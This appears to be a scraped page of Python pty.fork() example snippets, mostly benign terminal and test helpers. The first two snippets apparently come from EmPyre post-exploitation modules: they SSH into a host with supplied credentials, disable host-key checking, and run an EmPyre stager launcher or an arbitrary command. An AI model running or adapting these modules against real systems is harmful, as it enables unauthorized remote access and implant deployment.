def generate(self):
login = self.options['Login']['Value']
password = self.options['Password']['Value']
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
littleSnitch = self.options['LittleSnitch']['Value']
isEmpire = self.mainMenu.listeners.is_listener_empyre(listenerName)
if not isEmpire:
print helpers.color("[!] EmPyre listener required!")
return ""
# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(listenerName, userAgent=userAgent, littlesnitch=littleSnitch)
launcher = launcher.replace("'", "\\'")
launcher = launcher.replace('"', '\\"')
if launcher == "":
print helpers.color("[!] Error in launcher command generation.")
return ""
script = """
import os
import pty
def wall(host, pw):
import os,pty
pid, fd = pty.fork()
if pid == 0:
os.execvp('ssh', ['ssh', '-o StrictHostKeyChecking=no', host, '%s'])
os._exit(1)
os.read(fd, 1024)
os.write(fd, '\\n' + pw + '\\n')
result = []
while True:
try:
data = os.read(fd, 1024)
if data == "Password:":
os.write(fd, pw + '\\n')
except OSError:
break
if not data:
break
result.append(data)
pid, status = os.waitpid(pid, 0)
return status, ''.join(result)
status, output = wall('%s','%s')
print status
print output
""" % (launcher, login, password)
return script
python类fork()的实例源码
def generate(self):
login = self.options['Login']['Value']
password = self.options['Password']['Value']
command = self.options['Command']['Value']
# generate the launcher code
script = """
import os
import pty
def wall(host, pw):
import os,pty
pid, fd = pty.fork()
if pid == 0: # Child
os.execvp('ssh', ['ssh', '-o StrictHostKeyChecking=no', host, '%s'])
os._exit(1) # fail to execv
# read '..... password:', write password
os.read(fd, 1024)
os.write(fd, '\\n' + pw + '\\n')
result = []
while True:
try:
data = os.read(fd, 1024)
if data == "Password:":
os.write(fd, pw + '\\n')
except OSError:
break
if not data:
break
result.append(data)
pid, status = os.waitpid(pid, 0)
return status, ''.join(result)
status, output = wall('%s','%s')
print status
print output
""" % (command, login, password)
return script
def open(self, command, env={}):
""" Create subprocess using forkpty() """
# parse command
command_arr = shlex.split(command)
executable = command_arr[0]
args = command_arr
# try to fork a new pty
try:
self.pid, self.fd = pty.fork()
except:
return False
# child proc, replace with command after altering terminal attributes
if self.pid == 0:
# set requested environment variables
for k in env.keys():
os.environ[k] = env[k]
# set tty attributes
try:
attrs = tty.tcgetattr(1)
attrs[0] = attrs[0] ^ tty.IGNBRK
attrs[0] = attrs[0] | tty.BRKINT | tty.IXANY | tty.IMAXBEL
attrs[2] = attrs[2] | tty.HUPCL
attrs[3] = attrs[3] | tty.ICANON | tty.ECHO | tty.ISIG | tty.ECHOKE
attrs[6][tty.VMIN] = 1
attrs[6][tty.VTIME] = 0
tty.tcsetattr(1, tty.TCSANOW, attrs)
except:
pass
# replace this process with the subprocess
os.execvp(executable, args)
# else master, do nothing
else:
pass
def check_input_tty(self, prompt, terminal_input, stdio_encoding=None):
if not sys.stdin.isatty() or not sys.stdout.isatty():
self.skipTest("stdin and stdout must be ttys")
r, w = os.pipe()
try:
pid, fd = pty.fork()
except (OSError, AttributeError) as e:
os.close(r)
os.close(w)
self.skipTest("pty.fork() raised {}".format(e))
if pid == 0:
# Child
try:
# Make sure we don't get stuck if there's a problem
signal.alarm(2)
os.close(r)
# Check the error handlers are accounted for
if stdio_encoding:
sys.stdin = io.TextIOWrapper(sys.stdin.detach(),
encoding=stdio_encoding,
errors='surrogateescape')
sys.stdout = io.TextIOWrapper(sys.stdout.detach(),
encoding=stdio_encoding,
errors='replace')
with open(w, "w") as wpipe:
print("tty =", sys.stdin.isatty() and sys.stdout.isatty(), file=wpipe)
print(ascii(input(prompt)), file=wpipe)
except:
traceback.print_exc()
finally:
# We don't want to return to unittest...
os._exit(0)
# Parent
os.close(w)
os.write(fd, terminal_input + b"\r\n")
# Get results from the pipe
with open(r, "r") as rpipe:
lines = []
while True:
line = rpipe.readline().strip()
if line == "":
# The other end was closed => the child exited
break
lines.append(line)
# Check the result was got and corresponds to the user's terminal input
if len(lines) != 2:
# Something went wrong, try to get at stderr
with open(fd, "r", encoding="ascii", errors="ignore") as child_output:
self.fail("got %d lines in pipe but expected 2, child output was:\n%s"
% (len(lines), child_output.read()))
os.close(fd)
# Check we did exercise the GNU readline path
self.assertIn(lines[0], {'tty = True', 'tty = False'})
if lines[0] != 'tty = True':
self.skipTest("standard IO in should have been a tty")
input_result = eval(lines[1]) # ascii() -> eval() roundtrip
if stdio_encoding:
expected = terminal_input.decode(stdio_encoding, 'surrogateescape')
else:
expected = terminal_input.decode(sys.stdin.encoding) # what else?
self.assertEqual(input_result, expected)
def __pty_make_controlling_tty(self, tty_fd):
'''This makes the pseudo-terminal the controlling tty. This should be
more portable than the pty.fork() function. Specifically, this should
work on Solaris. '''
child_name = os.ttyname(tty_fd)
# Disconnect from controlling tty. Harmless if not already connected.
try:
fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY)
if fd >= 0:
os.close(fd)
# which exception, shouldnt' we catch explicitly .. ?
except OSError:
# Already disconnected. This happens if running inside cron.
pass
os.setsid()
# Verify we are disconnected from controlling tty
# by attempting to open it again.
try:
fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY)
if fd >= 0:
os.close(fd)
raise Exception('Failed to disconnect from ' +
'controlling tty. It is still possible to open /dev/tty.')
# which exception, shouldnt' we catch explicitly .. ?
except OSError:
# Good! We are disconnected from a controlling tty.
pass
# Verify we can open child pty.
fd = os.open(child_name, os.O_RDWR)
if fd < 0:
raise Exception("Could not open child pty, " + child_name)
else:
os.close(fd)
# Verify we now have a controlling tty.
fd = os.open("/dev/tty", os.O_WRONLY)
if fd < 0:
raise Exception("Could not open controlling tty, /dev/tty")
else:
os.close(fd)
def ptyPopen(args, executable=None, env=None, shell=False):
"""Less featureful but inspired by subprocess.Popen.
Runs subprocess in a pty"""
#
# Note: In theory the right answer here is to subclass Popen,
# but we found that in practice we'd have to reimplement most
# of that class, because its handling of file descriptors is
# too brittle in its _execute_child() code.
#
def __drain(masterf, outlist):
# Use a list as a way to pass by reference
while True:
chunksz = 1024
termdata = masterf.read(chunksz)
outlist.append(termdata)
if len(termdata) < chunksz:
# assume we hit EOF
break
# This is the arg handling protocol from Popen
if isinstance(args, six.string_types):
args = [args]
else:
args = list(args)
if shell:
args = ["/bin/sh", "-c"] + args
if executable:
args[0] = executable
if executable is None:
executable = args[0]
pid,fd = pty.fork()
if pid == 0:
try:
# Child
if env is None:
os.execvp(executable, args)
else:
os.execvpe(executable, args, env)
except:
traceback.print_exc()
os._exit(99)
else:
masterf = os.fdopen(fd, "rb")
outlist = []
t = threading.Thread(target=__drain,
args=(masterf, outlist))
t.start()
waitedpid, retcode = os.waitpid(pid, 0)
retcode = retcode >> 8
t.join()
return retcode, b"".join(outlist)
def fakeroot_create():
test_root = os.path.join(g_tempdir, "ips.test.{0:d}".format(os.getpid()))
fakeroot = os.path.join(test_root, "fakeroot")
cmd_path = os.path.join(fakeroot, "pkg")
try:
os.stat(cmd_path)
except OSError as e:
pass
else:
# fakeroot already exists
raise RuntimeError("The fakeroot shouldn't already exist.\n"
"Path is:{0}".format(cmd_path))
# when creating the fakeroot we want to make sure pkg doesn't
# touch the real root.
env_sanitize(cmd_path)
#
# When accessing images via the pkg apis those apis will try
# to access the image containing the command from which the
# apis were invoked. Normally when running the test suite the
# command is run.py in a developers workspace, and that
# workspace lives in the root image. But accessing the root
# image during a test suite run is verboten. Hence, here we
# create a temporary image from which we can run the pkg
# command.
#
# create directories
mkdir_eexist_ok(test_root)
mkdir_eexist_ok(fakeroot)
debug("fakeroot image create {0}".format(fakeroot))
progtrack = pkg.client.progress.NullProgressTracker()
api_inst = pkg.client.api.image_create(PKG_CLIENT_NAME,
CLIENT_API_VERSION, fakeroot,
pkg.client.api.IMG_TYPE_ENTIRE, False,
progtrack=progtrack, cmdpath=cmd_path)
#
# put a copy of the pkg command in our fake root directory.
# we do this because when recursive linked image commands are
# run, the pkg interfaces may fork and exec additional copies
# of pkg(1), and in this case we want them to run the copy of
# pkg from the fake root.
#
fakeroot_cmdpath = os.path.join(fakeroot, "pkg")
shutil.copy(os.path.join(g_pkg_path, "usr", "bin", "pkg"),
fakeroot_cmdpath)
return fakeroot, fakeroot_cmdpath